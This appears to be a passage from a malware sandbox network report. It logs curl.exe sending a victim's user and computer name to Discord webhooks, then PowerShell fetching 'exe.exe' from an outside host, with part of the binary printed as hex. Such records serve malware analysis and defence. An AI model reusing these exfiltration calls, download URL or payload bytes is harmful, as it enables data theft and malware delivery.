  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YGklYx1d2cW8BhgkyRVfbOYioO2vcAIqF2jAmrfbgQ%2B2UkIwFApw7DcJAiHc4J6eu5ZqmbonDzDZEOHQXdTjyKnZrbUXYuAaPS7XyqtOxWKaV%2BUZ0MCGesKq2e9l"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Content-Type-Options: nosniff
  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
  Set-Cookie: __sdcfduid=2d2e4b4e83d711efbbb5069e833022f9cef3e9ced00fa7b64b4c1686e6ff1a63df6cc21685dcedc62ec80ba1cc5929de; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
  Set-Cookie: __cfruid=b37bbe72c413031a900b56b1d31d11a902acd7e0-1728214567; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-06 11:36:07 UTC  211                IN
  Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 35 7a 41 68 51 52 49 79 4f 62 45 70 78 50 37 61 4f 35 6e 67 49 6e 43 4d 62 59 71 55 46 4c 73 30 54 68 62 42 46 6b 4e 61 49 4a 45 2d 31 37 32 38 32 31 34 35 36 37 31 31 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 61 31 34 32 64 62 32 30 66 38 39 2d 45 57 52 0d 0a 0d 0a
  Data Ascii: Set-Cookie: _cfuvid=5zAhQRIyObEpxP7aO5ngInCMbYqUFLs0ThbBFkNaIJE-1728214567111-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55a142db20f89-EWR
2024-10-06 11:36:07 UTC  45                 IN
  Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
  Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.8  49710        162.159.137.232  443               3524  C:\Windows\System32\curl.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-06 11:36:08 UTC  229                OUT
  POST /api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz HTTP/1.1
  Host: discord.com
  User-Agent: curl/7.83.1
  Accept: */*
  Content-Type: application/json
  Content-Length: 45
2024-10-06 11:36:08 UTC  45                 OUT
  Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 59 41 59 20 68 75 62 65 72 74 2c 20 43 6f 6d 70 75 74 65 72 3a 20 48 55 42 45 52 54 2d 50 43 22 7d
  Data Ascii: {"content":"YAY user, Computer: user-PC"}
2024-10-06 11:36:08 UTC  1341               IN
  HTTP/1.1 404 Not Found
  Date: Sun, 06 Oct 2024 11:36:08 GMT
  Content-Type: application/json
  Content-Length: 45
  Connection: close
  set-cookie: __dcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
  x-ratelimit-limit: 5
  x-ratelimit-remaining: 4
  x-ratelimit-reset: 1728214569
  x-ratelimit-reset-after: 1
  via: 1.1 google
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOoC3SBezCg0nU%2BOEXHjKZMPd4R86nMK2v7QN9Pkdfjq21IFcLAifYU2D%2BnK0og1p%2FKSJQL2b0ZQdQ09N%2BWhw5avZO39PrnzuD%2BfH93z7osICy9a6h%2FmZP4jcTni"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Content-Type-Options: nosniff
  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
  Set-Cookie: __sdcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f149dd75b89a5720c855583c6a29207d0006d76d49577469e0cf5f2f0ca379ffa1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
  Set-Cookie: __cfruid=bb964afb29782512641559f220b160214513b907-1728214568; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-06 11:36:08 UTC  211                IN
  Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4f 4b 31 39 35 46 58 45 68 74 58 32 4d 37 74 46 33 50 6a 36 48 31 6b 30 34 42 6b 6f 4e 75 32 77 6b 50 4b 75 56 41 36 4f 32 34 49 2d 31 37 32 38 32 31 34 35 36 38 35 33 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 61 31 63 66 65 37 65 63 34 34 66 2d 45 57 52 0d 0a 0d 0a
  Data Ascii: Set-Cookie: _cfuvid=OK195FXEhtX2M7tF3Pj6H1k04BkoNu2wkPKuVA6O24I-1728214568536-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55a1cfe7ec44f-EWR
2024-10-06 11:36:08 UTC  45                 IN
  Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
  Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID: 2
Source IP: 192.168.2.8
Source Port: 64892
Destination IP: 162.159.128.233
Destination Port: 443
PID: 6364
Process: C:\Windows\System32\curl.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-06 11:37:28 UTC | 233 | OUT | POST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1
Host: ptb.discord.com
User-Agent: curl/7.83.1
Accept: */*
Content-Type: application/json
Content-Length: 91
2024-10-06 11:37:28 UTC | 91 | OUT | Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 46 61 69 6c 65 64 20 74 6f 20 63 68 61 6e 67 65 20 64 69 72 65 63 74 6f 72 79 20 74 6f 20 27 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 44 6f 63 75 6d 65 6e 74 73 5c 5c 53 65 63 72 65 74 20 44 6f 63 75 6d 65 6e 74 27 22 7d
Data Ascii: {"content":"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'"}
2024-10-06 11:37:28 UTC | 1345 | IN | HTTP/1.1 404 Not Found
Date: Sun, 06 Oct 2024 11:37:28 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
set-cookie: __dcfduid=5db2103e83d711efb9496aa08501a966; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1728214649
x-ratelimit-reset-after: 1
via: 1.1 google
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LtjJdExVy97iaETFDYwF%2F7DxwZGf2Vm9Bpjw9FE3s3a114TFt%2BxXYNdNiRVrgkncYTVuXkLtFGihwfWwK7lMLkwLcCCQgQqodupcxuKxbzzYx3X6yZUyYnVfVuKOTAwSBw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=5db2103e83d711efb9496aa08501a9665f4224957175ab610e045a13edcb3f791b0e3e2b5c889874fe9ef19eba1a1711; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=4216abe66f60e6f26d03b5316b71ec33601d74bb-1728214648; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-06 11:37:28 UTC | 211 | IN | Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 47 41 77 64 42 4f 5f 48 45 37 30 4f 49 69 4b 36 45 4e 6a 72 52 67 71 55 41 43 7a 67 63 69 58 65 6a 4c 4b 65 5f 47 66 56 53 75 49 2d 31 37 32 38 32 31 34 36 34 38 35 30 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 63 31 30 64 64 33 32 35 35 39 30 2d 45 57 52 0d 0a 0d 0a
Data Ascii: Set-Cookie: _cfuvid=GAwdBO_HE70OIiK6ENjrRgqUACzgciXejLKe_GfVSuI-1728214648505-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55c10dd325590-EWR
2024-10-06 11:37:28 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID: 3
Source IP: 192.168.2.8
Source Port: 64897
Destination IP: 162.159.128.233
Destination Port: 443
PID: 4268
Process: C:\Windows\System32\curl.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-06 11:37:30 UTC | 234 | OUT | POST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1
Host: ptb.discord.com
User-Agent: curl/7.83.1
Accept: */*
Content-Type: application/json
Content-Length: 114
2024-10-06 11:37:30 UTC | 114 | OUT | Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 46 61 69 6c 65 64 20 74 6f 20 63 72 65 61 74 65 20 61 6e 64 20 63 68 61 6e 67 65 20 64 69 72 65 63 74 6f 72 79 20 74 6f 20 27 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 44 6f 63 75 6d 65 6e 74 73 5c 5c 53 65 63 72 65 74 20 44 6f 63 75 6d 65 6e 74 27 20 61 66 74 65 72 20 72 65 74 72 79 22 7d
Data Ascii: {"content":"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry"}
2024-10-06 11:37:30 UTC | 1347 | IN | HTTP/1.1 404 Not Found
Date: Sun, 06 Oct 2024 11:37:30 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
set-cookie: __dcfduid=5f138d1883d711ef9a43b24ca2cdc774; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1728214652
x-ratelimit-reset-after: 1
via: 1.1 google
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19sInuO38Ar0dPAU27c3KDCtTqzB8lQk2%2FecDwtHb3Kpc6QhtSqbhu6RTGBXgn65K8opGlRi%2BPsDGdGtxRuiTcSqGjN6wQzsxCRXNtARTWY02wFf9uHr%2F3W0eS9DOn11yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=5f138d1883d711ef9a43b24ca2cdc774fb28e2dbb8f9a4eb9da8c2268aeffa1bb73952ade3ca065bd126775ba035ce45; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=5c1c52db2546bb0b04da3053595ec57af65671bc-1728214650; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-06 11:37:30 UTC | 211 | IN | Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 46 64 65 59 32 70 72 41 70 49 4c 6f 54 78 66 35 74 37 72 69 78 73 54 67 47 53 32 67 6f 48 6e 4d 57 77 43 66 67 49 4a 49 43 36 6b 2d 31 37 32 38 32 31 34 36 35 30 38 32 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 63 31 66 34 39 65 37 34 33 34 30 2d 45 57 52 0d 0a 0d 0a
Data Ascii: Set-Cookie: _cfuvid=FdeY2prApILoTxf5t7rixsTgGS2goHnMWwCfgIJIC6k-1728214650823-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55c1f49e74340-EWR
2024-10-06 11:37:30 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID: 4
Source IP: 192.168.2.8
Source Port: 64901
Destination IP: 185.199.108.153
Destination Port: 443
PID: 6104
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-06 11:37:33 UTC | 65 | OUT | GET /exe.exe HTTP/1.1
Host: diva.ink
Connection: Keep-Alive
2024-10-06 11:37:33 UTC | 651 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 80384
Server: GitHub.com
Content-Type: application/octet-stream
Last-Modified: Sat, 05 Oct 2024 21:16:13 GMT
Access-Control-Allow-Origin: *
ETag: "6701ac9d-13a00"
expires: Sun, 06 Oct 2024 11:47:33 GMT
Cache-Control: max-age=600
x-proxy-cache: MISS
X-GitHub-Request-Id: 8F6A:29763:32F8CFC:38B3DBC:67027676
Accept-Ranges: bytes
Age: 0
Date: Sun, 06 Oct 2024 11:37:33 GMT
Via: 1.1 varnish
X-Served-By: cache-nyc-kteb1890082-NYC
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1728214654.576227,VS0,VE29
Vary: Accept-Encoding
X-Fastly-Request-ID: 457d992239a1b159f460a9d81464e35786845944
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 dc 09 d7 d6 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 32 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"02 @ `@@
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 04 03 28 22 00 00 0a 2a 36 02 7c e0 00 00 04 03 28 22 00 00 0a 2a 36 02 7c e7 00 00 04 03 28 22 00 00 0a 2a 36 02 7c ef 00 00 04 03 28 22 00 00 0a 2a 36 02 7c f5 00 00 04 03 28 22 00 00 0a 2a 46 02 7b fa 00 00 04 7e 2a 00 00 04 28 2b 00 00 06 2a 36 02 7c fc 00 00 04 03 28 22 00 00 0a 2a 56 72 5d 31 00 70 80 06 01 00 04 72 f0 31 00 70 80 07 01 00 04 2a 13 30 02 00 37 00 00 00 01 00 00 11 12 00 28 16 00 00 0a 7d 07 00 00 04 12 00 02 7d 08 00 00 04 12 00 15 7d 06 00 00 04 12 00 7c 07 00 00 04 12 00 28 01 00 00 2b 12 00 7c 07 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 02 00 00 11 12 00 28 16 00 00 0a 7d 0b 00 00 04 12 00 02 7d 0c 00 00 04 12 00 03 7d 0d 00 00 04 12 00 15 7d 0a 00 00 04 12 00 7c 0b 00 00 04 12 00 28 02 00 00 2b 12 00 7c 0b 00 00 04
                                                                                                                              Data Ascii: ("*6|("*6|("*6|("*6|("*F{~*(+*6|("*Vr]1pr1p*07(}}}|(+|(*0?(}}}}|(+|
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 00 00 04 12 02 02 28 0a 00 00 2b de 7a 02 7b 13 00 00 04 0c 02 7c 13 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 10 00 00 04 12 02 28 1f 00 00 0a 07 7b 04 00 00 04 6f 24 00 00 0a 07 14 7d 04 00 00 04 07 7b 05 00 00 04 6f 26 00 00 0a 07 14 7d 05 00 00 04 07 16 7d 03 00 00 04 de 17 0d 02 1f fe 7d 10 00 00 04 02 7c 11 00 00 04 09 28 20 00 00 0a de 13 02 1f fe 7d 10 00 00 04 02 7c 11 00 00 04 28 21 00 00 0a 2a 41 1c 00 00 00 00 00 00 0e 00 00 00 53 01 00 00 61 01 00 00 17 00 00 00 1b 00 00 01 1b 30 04 00 75 02 00 00 08 00 00 11 02 7b 16 00 00 04 0a 02 7b 18 00 00 04 0b 06 17 36 51 02 73 10 00 00 06 7d 19 00 00 04 02 7b 19 00 00 04 02 7b 18 00 00 04 7d 14 00 00 04 02 07 7b 05 00 00 04 6f 29 00 00 0a 7d 1a 00 00 04 02 7b 19 00 00 04 14 7d 15 00 00 04 14 0c 02 07
                                                                                                                              Data Ascii: (+z{|%}({o$}{o&}}}|( }|(!*ASa0u{{6Qs}{{}{o)}{}
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 15 00 00 2b 12 00 7c 3d 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 37 00 00 00 0f 00 00 11 12 00 28 4e 00 00 0a 7d 41 00 00 04 12 00 02 7d 42 00 00 04 12 00 15 7d 40 00 00 04 12 00 7c 41 00 00 04 12 00 28 16 00 00 2b 12 00 7c 41 00 00 04 28 50 00 00 0a 2a 00 13 30 02 00 37 00 00 00 10 00 00 11 12 00 28 16 00 00 0a 7d 4b 00 00 04 12 00 02 7d 4c 00 00 04 12 00 15 7d 4a 00 00 04 12 00 7c 4b 00 00 04 12 00 28 17 00 00 2b 12 00 7c 4b 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 11 00 00 11 12 00 28 51 00 00 0a 7d 50 00 00 04 12 00 02 7d 51 00 00 04 12 00 03 7d 52 00 00 04 12 00 15 7d 4f 00 00 04 12 00 7c 50 00 00 04 12 00 28 18 00 00 2b 12 00 7c 50 00 00 04 28 53 00 00 0a 2a 00 13 30 02 00 4f 00 00 00 12 00 00 11 12 00 28 51 00 00 0a 7d 57 00 00 04 12
                                                                                                                              Data Ascii: +|=(*07(N}A}B}@|A(+|A(P*07(}K}L}J|K(+|K(*0?(Q}P}Q}R}O|P(+|P(S*0O(Q}W
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 00 00 0a 7d a3 00 00 04 12 00 02 7d a4 00 00 04 12 00 15 7d a2 00 00 04 12 00 7c a3 00 00 04 12 00 28 27 00 00 2b 12 00 7c a3 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 37 00 00 00 23 00 00 11 12 00 28 16 00 00 0a 7d a7 00 00 04 12 00 02 7d a8 00 00 04 12 00 15 7d a6 00 00 04 12 00 7c a7 00 00 04 12 00 28 28 00 00 2b 12 00 7c a7 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 24 00 00 11 12 00 28 16 00 00 0a 7d ab 00 00 04 12 00 02 7d ad 00 00 04 12 00 03 7d ac 00 00 04 12 00 15 7d aa 00 00 04 12 00 7c ab 00 00 04 12 00 28 29 00 00 2b 12 00 7c ab 00 00 04 28 18 00 00 0a 2a 00 13 30 04 00 1f 00 00 00 25 00 00 11 17 0a 1f 1d 0b 28 5c 00 00 0a 28 5d 00 00 0a 6f 5e 00 00 0a 07 12 00 1a 28 16 00 00 06 26 2a 00 13 30 04 00 1f 00 00 00 25 00 00 11 16 0a 1f
                                                                                                                              Data Ascii: }}}|('+|(*07#(}}}|((+|(*0?$(}}}}|()+|(*0%(\(]o^(&*0%
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 02 00 37 00 00 00 34 00 00 11 12 00 28 16 00 00 0a 7d f5 00 00 04 12 00 02 7d f6 00 00 04 12 00 15 7d f4 00 00 04 12 00 7c f5 00 00 04 12 00 28 36 00 00 2b 12 00 7c f5 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 35 00 00 11 12 00 28 16 00 00 0a 7d fc 00 00 04 12 00 02 7d fd 00 00 04 12 00 03 7d fe 00 00 04 12 00 15 7d fb 00 00 04 12 00 7c fc 00 00 04 12 00 28 37 00 00 2b 12 00 7c fc 00 00 04 28 18 00 00 0a 2a 00 13 30 04 00 ab 00 00 00 00 00 00 00 73 78 00 00 0a 80 26 00 00 04 73 09 00 00 06 80 27 00 00 04 7e 06 01 00 04 80 28 00 00 04 7e 07 01 00 04 80 29 00 00 04 72 e9 01 00 70 80 2a 00 00 04 73 79 00 00 0a 80 2b 00 00 04 73 7a 00 00 0a 80 2c 00 00 04 73 7b 00 00 0a 80 2d 00 00 04 73 79 00 00 0a 25 72 f5 01 00 70 72 07 02 00 70 6f 7c 00 00 0a
                                                                                                                              Data Ascii: 74(}}}|(6+|(*0?5(}}}}|(7+|(*0sx&s'~(~)rp*sy+sz,s{-sy%rprpo|
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 20 00 00 06 0c 08 28 39 00 00 0a 7e 27 00 00 04 08 6f 07 00 00 06 6f 1c 00 00 0a 0d 12 03 28 1d 00 00 0a 2d 3c 02 16 25 0a 7d 3c 00 00 04 02 09 7d 3f 00 00 04 02 7c 3d 00 00 04 12 03 02 28 3b 00 00 2b de 51 02 7b 3f 00 00 04 0d 02 7c 3f 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 3c 00 00 04 12 03 28 1f 00 00 0a de 19 13 04 02 1f fe 7d 3c 00 00 04 02 7c 3d 00 00 04 11 04 28 20 00 00 0a de 13 02 1f fe 7d 3c 00 00 04 02 7c 3d 00 00 04 28 21 00 00 0a 2a 00 01 10 00 00 00 00 07 00 ff 06 01 19 1b 00 00 01 1b 30 06 00 3d 04 00 00 39 00 00 11 02 7b 40 00 00 04 0a 06 45 04 00 00 00 e6 01 00 00 4f 02 00 00 eb 02 00 00 a3 03 00 00 02 7b 42 00 00 04 72 be 06 00 70 6f 82 00 00 0a 28 1d 00 00 06 72 26 07 00 70 6f 82 00 00 0a 0c 02 7b 42 00 00 04 72 be 06 00 70 6f 82 00
                                                                                                                              Data Ascii: (9~'oo(-<%}<}?|=(;+Q{?|?%}<(}<|=( }<|=(!*0=9{@EO{Brpo(r&po{Brpo
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 08 1f 0a 2e 0d 08 1f 0b 3b e7 00 00 00 38 b5 04 00 00 7e 28 00 00 04 28 25 00 00 06 6f 1c 00 00 0a 0d 12 03 28 1d 00 00 0a 2d 3f 02 16 25 0a 7d 4a 00 00 04 02 09 7d 4d 00 00 04 02 7c 4b 00 00 04 12 03 02 28 41 00 00 2b dd a7 04 00 00 02 7b 4d 00 00 04 0d 02 7c 4d 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 4a 00 00 04 12 03 28 1f 00 00 0a 02 7b 4c 00 00 04 72 be 06 00 70 6f 82 00 00 0a 28 1d 00 00 06 72 b1 08 00 70 6f 82 00 00 0a a5 52 00 00 01 28 24 00 00 06 6f 1c 00 00 0a 0d 12 03 28 1d 00 00 0a 2d 3f 02 17 25 0a 7d 4a 00 00 04 02 09 7d 4d 00 00 04 02 7c 4b 00 00 04 12 03 02 28 41 00 00 2b dd 29 04 00 00 02 7b 4d 00 00 04 0d 02 7c 4d 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 4a 00 00 04 12 03 28 1f 00 00 0a 38 d3 03 00 00 72 d7 08 00 70 28 39 00 00 0a 38
                                                                                                                              Data Ascii: .;8~((%o(-?%}J}M|K(A+{M|M%}J({Lrpo(rpoR($o(-?%}J}M|K(A+){M|M%}J(8rp(98
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 53 00 00 04 6f 8f 00 00 0a 72 c2 07 00 70 72 de 07 00 70 7e 28 00 00 04 28 69 00 00 0a 6f 90 00 00 0a 28 49 00 00 0a 72 e8 07 00 70 73 91 00 00 0a 0d 00 06 2c 48 06 17 3b a7 00 00 00 02 7b 53 00 00 04 08 09 6f 92 00 00 0a 6f 93 00 00 0a 13 04 12 04 28 94 00 00 0a 2d 41 02 16 25 0a 7d 4f 00 00 04 02 11 04 7d 54 00 00 04 02 7c 50 00 00 04 12 04 02 28 43 00 00 2b dd e5 00 00 00 02 7b 54 00 00 04 13 04 02 7c 54 00 00 04 fe 15 11 00 00 1b 02 15 25 0a 7d 4f 00 00 04 12 04 28 96 00 00 0a 25 6f 97 00 00 0a 26 6f 98 00 00 0a 6f 99 00 00 0a 6f 9a 00 00 0a 13 05 12 05 28 9b 00 00 0a 2d 3e 02 17 25 0a 7d 4f 00 00 04 02 11 05 7d 55 00 00 04 02 7c 50 00 00 04 12 05 02 28 44 00 00 2b de 7f 02 7b 55 00 00 04 13 05 02 7c 55 00 00 04 fe 15 13 00 00 1b 02 15 25 0a 7d 4f 00
                                                                                                                              Data Ascii: Sorprp~((io(Irps,H;{Soo(-A%}O}T|P(C+{T|T%}O(%o&ooo(->%}O}U|P(D+{U|U%}O
